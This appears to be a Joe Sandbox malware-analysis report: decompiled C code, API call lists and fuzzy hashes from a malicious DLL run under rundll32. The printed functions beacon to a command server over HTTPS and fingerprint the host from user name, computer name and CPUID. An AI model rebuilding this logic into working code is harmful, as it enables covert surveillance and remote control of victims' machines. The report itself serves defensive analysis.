                                					_t83 =  *0x428d2a8; // 0xaea5a8
                                					_t6 = _t83 + 0x428e8d4; // 0x736e6426
                                					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
                                					_t108 = _t108 + 0xc;
                                					_t102 = _t102 + _t86;
                                					HeapFree( *0x428d238, 0, _t96);
                                				}
                                				_t97 = E04289267();
                                				if(_t97 != 0) {
                                					_t78 =  *0x428d2a8; // 0xaea5a8
                                					_t8 = _t78 + 0x428e8dc; // 0x6f687726
                                					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
                                					_t108 = _t108 + 0xc;
                                					_t102 = _t102 + _t81;
                                					HeapFree( *0x428d238, 0, _t97);
                                				}
                                				_t98 =  *0x428d32c; // 0x4d795b0
                                				_a32 = E0428284E(0x428d00a, _t98 + 4);
                                				_t42 =  *0x428d2d0; // 0x0
                                				if(_t42 != 0) {
                                					_t74 =  *0x428d2a8; // 0xaea5a8
                                					_t11 = _t74 + 0x428e8b6; // 0x3d736f26
                                					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
                                					_t108 = _t108 + 0xc;
                                					_t102 = _t102 + _t77;
                                				}
                                				_t43 =  *0x428d2cc; // 0x0
                                				if(_t43 != 0) {
                                					_t71 =  *0x428d2a8; // 0xaea5a8
                                					_t13 = _t71 + 0x428e88d; // 0x3d706926
                                					wsprintfA(_t102 + _t105, _t13, _t43);
                                				}
                                				if(_a32 != 0) {
                                					_t100 = RtlAllocateHeap( *0x428d238, 0, 0x800);
                                					if(_t100 != 0) {
                                						E04283239(GetTickCount());
                                						_t50 =  *0x428d32c; // 0x4d795b0
                                						__imp__(_t50 + 0x40);
                                						asm("lock xadd [eax], ecx");
                                						_t54 =  *0x428d32c; // 0x4d795b0
                                						__imp__(_t54 + 0x40);
                                						_t56 =  *0x428d32c; // 0x4d795b0
                                						_t103 = E04287B8D(1, _t95, _t105,  *_t56);
                                						asm("lock xadd [eax], ecx");
                                						if(_t103 != 0) {
                                							StrTrimA(_t103, 0x428c28c);
                                							_push(_t103);
                                							_t62 = E0428A677();
                                							_v16 = _t62;
                                							if(_t62 != 0) {
                                								_t89 = __imp__;
                                								 *_t89(_t103, _v0);
                                								 *_t89(_t100, _a4);
                                								_t90 = __imp__;
                                								 *_t90(_t100, _v28);
                                								 *_t90(_t100, _t103);
                                								_t68 = E0428933A(0xffffffffffffffff, _t100, _v28, _v24); // executed
                                								_v52 = _t68;
                                								if(_t68 != 0 && _t68 != 0x10d2) {
                                									E04285433();
                                								}
                                								HeapFree( *0x428d238, 0, _v44);
                                							}
                                							RtlFreeHeap( *0x428d238, 0, _t103); // executed
                                						}
                                						RtlFreeHeap( *0x428d238, 0, _t100); // executed
                                					}
                                					HeapFree( *0x428d238, 0, _a24);
                                				}
                                				RtlFreeHeap( *0x428d238, 0, _t105); // executed
                                				return _a4;
                                			}

                                0x04289bf1
                                0x04289bf1
                                0x04289bf1
                                0x04289bf6
                                0x04289bfc
                                0x04289c06
                                0x04289c08
                                0x04289c08
                                0x04289c15
                                0x04289c20
                                0x04289c23
                                0x04289c2e
                                0x04289c31
                                0x04289c36
                                0x04289c39
                                0x04289c3e
                                0x04289c41
                                0x04289c4d
                                0x04289c5a
                                0x04289c5c
                                0x04289c62
                                0x04289c67
                                0x04289c72
                                0x04289c74
                                0x04289c77
                                0x04289c79
                                0x04289c7e
                                0x04289c82
                                0x04289c84
                                0x04289c89
                                0x04289c95
                                0x04289c97
                                0x04289ca3
                                0x04289ca5
                                0x04289ca5
                                0x04289cb0
                                0x04289cb4
                                0x04289cb6
                                0x04289cbb
                                0x04289cc7
                                0x04289cc9
                                0x04289cd5
                                0x04289cd7
                                0x04289cd7
                                0x04289cdd
                                0x04289cf0
                                0x04289cf4
                                0x04289cfb
                                0x04289cfe
                                0x04289d03
                                0x04289d0e
                                0x04289d10
                                0x04289d13
                                0x04289d13
                                0x04289d15
                                0x04289d1c
                                0x04289d1f
                                0x04289d24
                                0x04289d2e
                                0x04289d30
                                0x04289d38
                                0x04289d51
                                0x04289d55
                                0x04289d61
                                0x04289d66
                                0x04289d6f
                                0x04289d80
                                0x04289d84
                                0x04289d8d
                                0x04289d93
                                0x04289da0
                                0x04289dad
                                0x04289db3
                                0x04289dbf
                                0x04289dc5
                                0x04289dc6
                                0x04289dcb
                                0x04289dd1
                                0x04289dd7
                                0x04289dde
                                0x04289de5
                                0x04289deb
                                0x04289df2
                                0x04289df6
                                0x04289e01
                                0x04289e06
                                0x04289e0c
                                0x04289e15
                                0x04289e15
                                0x04289e26
                                0x04289e26
                                0x04289e35
                                0x04289e35
                                0x04289e44
                                0x04289e44
                                0x04289e56
                                0x04289e56
                                0x04289e65
                                0x04289e76

                                APIs
                                • GetTickCount.KERNEL32 ref: 04289C08
                                • wsprintfA.USER32 ref: 04289C55
                                • wsprintfA.USER32 ref: 04289C72
                                • wsprintfA.USER32 ref: 04289C95
                                • HeapFree.KERNEL32(00000000,00000000), ref: 04289CA5
                                • wsprintfA.USER32 ref: 04289CC7
                                • HeapFree.KERNEL32(00000000,00000000), ref: 04289CD7
                                • wsprintfA.USER32 ref: 04289D0E
                                • wsprintfA.USER32 ref: 04289D2E
                                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04289D4B
                                • GetTickCount.KERNEL32 ref: 04289D5B
                                • RtlEnterCriticalSection.NTDLL(04D79570), ref: 04289D6F
                                • RtlLeaveCriticalSection.NTDLL(04D79570), ref: 04289D8D
                                  • Part of subcall function 04287B8D: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7691C740,?,?,04289DA0,?,04D795B0), ref: 04287BB8
                                  • Part of subcall function 04287B8D: lstrlen.KERNEL32(?,?,?,04289DA0,?,04D795B0), ref: 04287BC0
                                  • Part of subcall function 04287B8D: strcpy.NTDLL ref: 04287BD7
                                  • Part of subcall function 04287B8D: lstrcat.KERNEL32(00000000,?), ref: 04287BE2
                                  • Part of subcall function 04287B8D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04289DA0,?,04D795B0), ref: 04287BFF
                                • StrTrimA.SHLWAPI(00000000,0428C28C,?,04D795B0), ref: 04289DBF
                                  • Part of subcall function 0428A677: lstrlen.KERNEL32(04D79B08,00000000,00000000,7691C740,04289DCB,00000000), ref: 0428A687
                                  • Part of subcall function 0428A677: lstrlen.KERNEL32(?), ref: 0428A68F
                                  • Part of subcall function 0428A677: lstrcpy.KERNEL32(00000000,04D79B08), ref: 0428A6A3
                                  • Part of subcall function 0428A677: lstrcat.KERNEL32(00000000,?), ref: 0428A6AE
                                • lstrcpy.KERNEL32(00000000,?), ref: 04289DDE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 04289DE5
                                • lstrcat.KERNEL32(00000000,?), ref: 04289DF2
                                • lstrcat.KERNEL32(00000000,00000000), ref: 04289DF6
                                  • Part of subcall function 0428933A: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,74E481D0), ref: 042893EC
                                • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 04289E26
                                • RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 04289E35
                                • RtlFreeHeap.NTDLL(00000000,00000000,?,04D795B0), ref: 04289E44
                                • HeapFree.KERNEL32(00000000,00000000), ref: 04289E56
                                • RtlFreeHeap.NTDLL(00000000,?), ref: 04289E65
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                • String ID: Ut
                                • API String ID: 3080378247-8415677
                                • Opcode ID: a7098ec602e98991b817afbe366827c79fc2546056aa3400121d5cb5f585188b
                                • Instruction ID: 47de77962bd2c198d96f129bb0a6e1b57ec847034fabf2d4cee7ae929fd0497e
                                • Opcode Fuzzy Hash: a7098ec602e98991b817afbe366827c79fc2546056aa3400121d5cb5f585188b
                                • Instruction Fuzzy Hash: 24619971312201AFE711AB68FC4CF6E7BA8EB48794F08011DF904D72A1DB29EC499B25
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 83%
                                			E04287C3D(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                				struct %anon52 _v8;
                                				long _v12;
                                				char _v16;
                                				char _v20;
                                				signed int _v24;
                                				intOrPtr _v32;
                                				union _LARGE_INTEGER _v36;
                                				intOrPtr _v40;
                                				void* _v44;
                                				void _v88;
                                				char _v92;
                                				struct %anon52 _t46;
                                				intOrPtr _t51;
                                				long _t53;
                                				void* _t54;
                                				struct %anon52 _t60;
                                				long _t64;
                                				signed int _t65;
                                				void* _t68;
                                				void* _t70;
                                				signed int _t71;
                                				intOrPtr _t73;
                                				intOrPtr _t76;
                                				void** _t78;
                                				void* _t80;
                                
                                				_t73 = __edx;
                                				_v92 = 0;
                                				memset( &_v88, 0, 0x2c);
                                				_t46 = CreateWaitableTimerA(0, 1, 0);
                                				_v44 = _t46;
                                				if(_t46 == 0) {
                                					_v8.LowPart = GetLastError();
                                				} else {
                                					_push(0xffffffff);
                                					_push(0xff676980);
                                					_push(0);
                                					_push( *0x428d240);
                                					_v20 = 0;
                                					_v16 = 0;
                                					L0428AF6E();
                                					_v36.LowPart = _t46;
                                					_v32 = _t73;
                                					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                					_t51 =  *0x428d26c; // 0x2c4
                                					_v40 = _t51;
                                					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                					_v8.LowPart = _t53;
                                					if(_t53 == 0) {
                                						if(_a8 != 0) {
                                							L4:
                                							 *0x428d24c = 5;
                                						} else {
                                							_t68 = E04285319(_t73); // executed
                                							if(_t68 != 0) {
                                								goto L4;
                                							}
                                						}
                                						_v12 = 0;
                                						L6:
                                						if(_v12 == 1 && ( *0x428d260 & 0x00000001) == 0) {
                                							_v12 = 2;
                                						}
                                						_t71 = _v12;
                                						_t58 = _t71 << 4;
                                						_t76 = _t80 + (_t71 << 4) - 0x54;
                                						_t72 = _t71 + 1;
                                						_v24 = _t71 + 1;
                                						_t60 = E04282C58(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16); // executed
                                						_v8.LowPart = _t60;
                                						if(_t60 != 0) {
                                							goto L17;
                                						}
                                						_t65 = _v24;
                                						_v12 = _t65;
                                						_t90 = _t65 - 3;
                                						if(_t65 != 3) {
                                							goto L6;
                                						} else {
                                							_v8.LowPart = E04289870(_t72, _t90,  &_v92, _a4, _a8);
                                						}
                                						goto L12;
                                						L17:
                                						__eflags = _t60 - 0x10d2;
                                						if(_t60 != 0x10d2) {
                                							_push(0xffffffff);
                                							_push(0xff676980);
                                							_push(0);
                                							_push( *0x428d244);
                                							goto L21;
                                						} else {
                                							__eflags =  *0x428d248; // 0x0
                                							if(__eflags == 0) {
                                								goto L12;
                                							} else {
                                								_t60 = E04285433();
                                								_push(0xffffffff);
                                								_push(0xdc3cba00);
                                								_push(0);
                                								_push( *0x428d248);
                                								L21:
                                								L0428AF6E();
                                								_v36.LowPart = _t60;
                                								_v32 = _t76;
                                								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
                                								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                								_v8.LowPart = _t64;
                                								__eflags = _t64;
                                								if(_t64 == 0) {
                                									goto L6;
                                								} else {
                                									goto L12;
                                								}
                                							}
                                						}
                                						L25:
                                					}
                                					L12:
                                					_t78 =  &_v92;
                                					_t70 = 3;
                                					do {
                                						_t54 =  *_t78;
                                						if(_t54 != 0) {
                                							HeapFree( *0x428d238, 0, _t54);
                                						}
                                						_t78 =  &(_t78[4]);
                                						_t70 = _t70 - 1;
                                					} while (_t70 != 0);
                                					CloseHandle(_v44);
                                				}
                                				return _v8;
                                				goto L25;
                                			}

                                APIs
                                • memset.NTDLL ref: 04287C52
                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 04287C5E
                                • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 04287C83
                                • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 04287C9F
                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04287CB8
                                • HeapFree.KERNEL32(00000000,00000000), ref: 04287D4E
                                • CloseHandle.KERNEL32(?), ref: 04287D5D
                                • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 04287D97
                                • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,0428312C,?), ref: 04287DAD
                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04287DB8
                                  • Part of subcall function 04285319: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04D79368,00000000,?,74E5F710,00000000,74E5F730), ref: 04285368
                                  • Part of subcall function 04285319: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04D793A0,?,00000000,30314549,00000014,004F0053,04D7935C), ref: 04285405
                                  • Part of subcall function 04285319: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04287CCB), ref: 04285417
                                • GetLastError.KERNEL32 ref: 04287DCA
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                • String ID: Ut
                                • API String ID: 3521023985-8415677
                                • Opcode ID: 0975a3429029ac45fd00e9c75cce97377fbd4786778a37cf4fddbedf90af53d1
                                • Instruction ID: 986911718efdac3b05138746f9f89c7a8b2dc6f60d300917923454615847c721
                                • Opcode Fuzzy Hash: 0975a3429029ac45fd00e9c75cce97377fbd4786778a37cf4fddbedf90af53d1
                                • Instruction Fuzzy Hash: 91519271A12229AFDF10EF95EC44DEEBFB8EF85320F20451AF411E2195D774AA44DBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 92%
                                			E0428A85C(void* __eax, void* __ecx, long __esi, char* _a4) {
                                				void _v8;
                                				long _v12;
                                				void _v16;
                                				void* _t34;
                                				void* _t38;
                                				void* _t40;
                                				char* _t56;
                                				long _t57;
                                				void* _t58;
                                				intOrPtr _t59;
                                				long _t65;
                                
                                				_t65 = __esi;
                                				_t58 = __ecx;
                                				_v16 = 0xea60;
                                				__imp__( *(__esi + 4));
                                				_v12 = __eax + __eax;
                                				_t56 = E04281525(__eax + __eax + 1);
                                				if(_t56 != 0) {
                                					if(InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0) == 0) {
                                						E04288B22(_t56);
                                					} else {
                                						E04288B22( *(__esi + 4));
                                						 *(__esi + 4) = _t56;
                                					}
                                				}
                                				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
                                				 *(_t65 + 0x10) = _t34;
                                				if(_t34 == 0 || InternetSetStatusCallback(_t34, E0428A7F1) == 0xffffffff) {
                                					L15:
                                					return GetLastError();
                                				} else {
                                					ResetEvent( *(_t65 + 0x1c));
                                					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x1bb, 0, 0, 3, 0, _t65); // executed
                                					 *(_t65 + 0x14) = _t38;
                                					if(_t38 != 0 || GetLastError() == 0x3e5 && E042829C0( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
                                						_t59 =  *0x428d2a8; // 0xaea5a8
                                						_t15 = _t59 + 0x428e743; // 0x544547
                                						_v8 = 0x84c03180;
                                						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84c03180, _t65); // executed
                                						 *(_t65 + 0x18) = _t40;
                                						if(_t40 == 0) {
                                							goto L15;
                                						}
                                						_t57 = 4;
                                						_v12 = _t57;
                                						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
                                							_v8 = _v8 | 0x00000100;
                                							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
                                						}
                                						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
                                							goto L15;
                                						} else {
                                							return 0;
                                						}
                                					} else {
                                						goto L15;
                                					}
                                				}
                                			}

                                APIs
                                • lstrlen.KERNEL32(?,00000008,74E04D40), ref: 0428A86E
                                  • Part of subcall function 04281525: RtlAllocateHeap.NTDLL(00000000,00000000,04281278), ref: 04281531
                                • InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 0428A891
                                • InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 0428A8B9
                                • InternetSetStatusCallback.WININET(00000000,0428A7F1), ref: 0428A8D0
                                • ResetEvent.KERNEL32(?), ref: 0428A8E2
                                • InternetConnectA.WININET(?,?,000001BB,00000000,00000000,00000003,00000000,?), ref: 0428A8F8
                                • GetLastError.KERNEL32 ref: 0428A905
                                • HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84C03180,?), ref: 0428A94B
                                • InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 0428A969
                                • InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 0428A98A
                                • InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 0428A996
                                • InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 0428A9A6
                                • GetLastError.KERNEL32 ref: 0428A9B0
                                  • Part of subcall function 04288B22: RtlFreeHeap.NTDLL(00000000,00000000,0428131A,00000000,?,?,00000000), ref: 04288B2E
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
                                • String ID:
                                • API String ID: 2290446683-0
                                • Opcode ID: 9745d1963a17838a2db388a0ba2edac69fa1447fc9580386a1551026ae8362d5
                                • Instruction ID: 7f4d9ada30f432c85bbcbb8859d0611917e134db626e1cf9bbe5c130ccf942ff
                                • Opcode Fuzzy Hash: 9745d1963a17838a2db388a0ba2edac69fa1447fc9580386a1551026ae8362d5
                                • Instruction Fuzzy Hash: 11417B71712204BBD721AFA5EC88E5F7ABDEF89700B10492EF542E20D0EB35B905CA20
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 51%
                                			E0428AC95(long _a4, long _a8) {
                                				signed int _v8;
                                				intOrPtr _v16;
                                				LONG* _v28;
                                				long _v40;
                                				long _v44;
                                				long _v48;
                                				CHAR* _v52;
                                				long _v56;
                                				CHAR* _v60;
                                				long _v64;
                                				signed int* _v68;
                                				char _v72;
                                				signed int _t76;
                                				signed int _t80;
                                				signed int _t81;
                                				intOrPtr* _t82;
                                				intOrPtr* _t83;
                                				intOrPtr* _t85;
                                				intOrPtr* _t90;
                                				intOrPtr* _t95;
                                				intOrPtr* _t98;
                                				struct HINSTANCE__* _t99;
                                				void* _t102;
                                				intOrPtr* _t104;
                                				void* _t115;
                                				long _t116;
                                				void _t125;
                                				void* _t131;
                                				signed short _t133;
                                				struct HINSTANCE__* _t138;
                                				signed int* _t139;
                                
                                				_t139 = _a4;
                                				_v28 = _t139[2] + 0x4280000;
                                				_t115 = _t139[3] + 0x4280000;
                                				_t131 = _t139[4] + 0x4280000;
                                				_v8 = _t139[7];
                                				_v60 = _t139[1] + 0x4280000;
                                				_v16 = _t139[5] + 0x4280000;
                                				_v64 = _a8;
                                				_v72 = 0x24;
                                				_v68 = _t139;
                                				_v56 = 0;
                                				asm("stosd");
                                				_v48 = 0;
                                				_v44 = 0;
                                				_v40 = 0;
                                				if(( *_t139 & 0x00000001) == 0) {
                                					_a8 =  &_v72;
                                					RaiseException(0xc06d0057, 0, 1,  &_a8);
                                					return 0;
                                				}
                                				_t138 =  *_v28;
                                				_t76 = _a8 - _t115 >> 2 << 2;
                                				_t133 =  *(_t131 + _t76);
                                				_a4 = _t76;
                                				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
                                				_v56 = _t80;
                                				_t81 = _t133 + 0x4280002;
                                				if(_t80 == 0) {
                                					_t81 = _t133 & 0x0000ffff;
                                				}
                                				_v52 = _t81;
                                				_t82 =  *0x428d1a0; // 0x0
                                				_t116 = 0;
                                				if(_t82 == 0) {
                                					L6:
                                					if(_t138 != 0) {
                                						L18:
                                						_t83 =  *0x428d1a0; // 0x0
                                						_v48 = _t138;
                                						if(_t83 != 0) {
                                							_t116 =  *_t83(2,  &_v72);
                                						}
                                						if(_t116 != 0) {
                                							L32:
                                							 *_a8 = _t116;
                                							L33:
                                							_t85 =  *0x428d1a0; // 0x0
                                							if(_t85 != 0) {
                                								_v40 = _v40 & 0x00000000;
                                								_v48 = _t138;
                                								_v44 = _t116;
                                								 *_t85(5,  &_v72);
                                							}
                                							return _t116;
                                						} else {
                                							if(_t139[5] == _t116 || _t139[7] == _t116) {
                                								L27:
                                								_t116 = GetProcAddress(_t138, _v52);
                                								if(_t116 == 0) {
                                									_v40 = GetLastError();
                                									_t90 =  *0x428d19c; // 0x0
                                									if(_t90 != 0) {
                                										_t116 =  *_t90(4,  &_v72);
                                									}
                                									if(_t116 == 0) {
                                										_a4 =  &_v72;
                                										RaiseException(0xc06d007f, _t116, 1,  &_a4);
                                										_t116 = _v44;
                                									}
                                								}
                                								goto L32;
                                							} else {
                                								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
                                								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
                                									_t116 =  *(_a4 + _v16);
                                									if(_t116 != 0) {
                                										goto L32;
                                									}
                                								}
                                								goto L27;
                                							}
                                						}
                                					}
                                					_t98 =  *0x428d1a0; // 0x0
                                					if(_t98 == 0) {
                                						L9:
                                						_t99 = LoadLibraryA(_v60); // executed
                                						_t138 = _t99;
                                						if(_t138 != 0) {
                                							L13:
                                							if(InterlockedExchange(_v28, _t138) == _t138) {
                                								FreeLibrary(_t138);
                                							} else {
                                								if(_t139[6] != 0) {
                                									_t102 = LocalAlloc(0x40, 8);
                                									if(_t102 != 0) {
                                										 *(_t102 + 4) = _t139;
                                										_t125 =  *0x428d198; // 0x0
                                										 *_t102 = _t125;
                                										 *0x428d198 = _t102;
                                									}
                                								}
                                							}
                                							goto L18;
                                						}
                                						_v40 = GetLastError();
                                						_t104 =  *0x428d19c; // 0x0
                                						if(_t104 == 0) {
                                							L12:
                                							_a8 =  &_v72;
                                							RaiseException(0xc06d007e, 0, 1,  &_a8);
                                							return _v44;
                                						}
                                						_t138 =  *_t104(3,  &_v72);
                                						if(_t138 != 0) {
                                							goto L13;
                                						}
                                						goto L12;
                                					}
                                					_t138 =  *_t98(1,  &_v72);
                                					if(_t138 != 0) {
                                						goto L13;
                                					}
                                					goto L9;
                                				}
                                				_t116 =  *_t82(0,  &_v72);
                                				if(_t116 != 0) {
                                					goto L33;
                                				}
                                				goto L6;
                                			}

                                APIs
                                • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0428AD0E
                                • LoadLibraryA.KERNEL32(?), ref: 0428AD8B
                                • GetLastError.KERNEL32 ref: 0428AD97
                                • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 0428ADCA
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
• Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp
• Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp
• Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp
• Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                • String ID: $
                                • API String ID: 948315288-3993045852
                                • Opcode ID: e1b44a9fab27bdc3af5b42c698ab3b09301a025222dc0429c15ccdd03f1904c1
                                • Instruction ID: 44dcb9467296c9bddee41cec102f5b4ff13c72692fdb244bf49c18f19e0faf02
                                • Opcode Fuzzy Hash: e1b44a9fab27bdc3af5b42c698ab3b09301a025222dc0429c15ccdd03f1904c1
                                • Instruction Fuzzy Hash: F7813C71B12606AFDB21DF99D884AADB7F5EF48711F10842EE905E7280EB74E905CB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 96%
                                			E04287A2E(char __eax, void* __esi) {
                                				long _v8;
                                				char _v12;
                                				signed int _v16;
                                				signed int _v20;
                                				signed int _v28;
                                				long _t34;
                                				signed int _t39;
                                				long _t50;
                                				char _t59;
                                				intOrPtr _t61;
                                				void* _t62;
                                				void* _t64;
                                				char _t65;
                                				intOrPtr* _t67;
                                				void* _t68;
                                				void* _t69;
                                
                                				_t69 = __esi;
                                				_t65 = __eax;
                                				_v8 = 0;
                                				_v12 = __eax;
                                				if(__eax == 0) {
                                					_t59 =  *0x428d270; // 0xd448b889
                                					_v12 = _t59;
                                				}
                                				_t64 = _t69;
                                				E04284F97( &_v12, _t64);
                                				if(_t65 != 0) {
                                					 *_t69 =  *_t69 ^  *0x428d2a4 ^ 0x46d76429;
                                				} else {
                                					GetUserNameW(0,  &_v8); // executed
                                					_t50 = _v8;
                                					if(_t50 != 0) {
                                						_t62 = RtlAllocateHeap( *0x428d238, 0, _t50 + _t50);
                                						if(_t62 != 0) {
                                							if(GetUserNameW(_t62,  &_v8) != 0) {
                                								_t64 = _t62;
                                								 *_t69 =  *_t69 ^ E04282C0D(_v8 + _v8, _t64);
                                							}
                                							HeapFree( *0x428d238, 0, _t62);
                                						}
                                					}
                                				}
                                				_t61 = __imp__;
                                				_v8 = _v8 & 0x00000000;
                                				GetComputerNameW(0,  &_v8);
                                				_t34 = _v8;
                                				if(_t34 != 0) {
                                					_t68 = RtlAllocateHeap( *0x428d238, 0, _t34 + _t34);
                                					if(_t68 != 0) {
                                						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                							_t64 = _t68;
                                							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E04282C0D(_v8 + _v8, _t64);
                                						}
                                						HeapFree( *0x428d238, 0, _t68);
                                					}
                                				}
                                				asm("cpuid");
                                				_t67 =  &_v28;
                                				 *_t67 = 1;
                                				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                				 *((intOrPtr*)(_t67 + 8)) = 0;
                                				 *(_t67 + 0xc) = _t64;
                                				_t39 = _v16 ^ _v20 ^ _v28;
                                				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
                                				return _t39;
                                			}

                                APIs
                                • GetUserNameW.ADVAPI32(00000000,?), ref: 04287A65
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 04287A7C
                                • GetUserNameW.ADVAPI32(00000000,?), ref: 04287A89
                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,042830EE), ref: 04287AAA
                                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04287AD1
                                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04287AE5
                                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04287AF2
                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,042830EE), ref: 04287B10
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
• Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp
• Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp
• Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp
• Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: HeapName$AllocateComputerFreeUser
                                • String ID: Ut
                                • API String ID: 3239747167-8415677
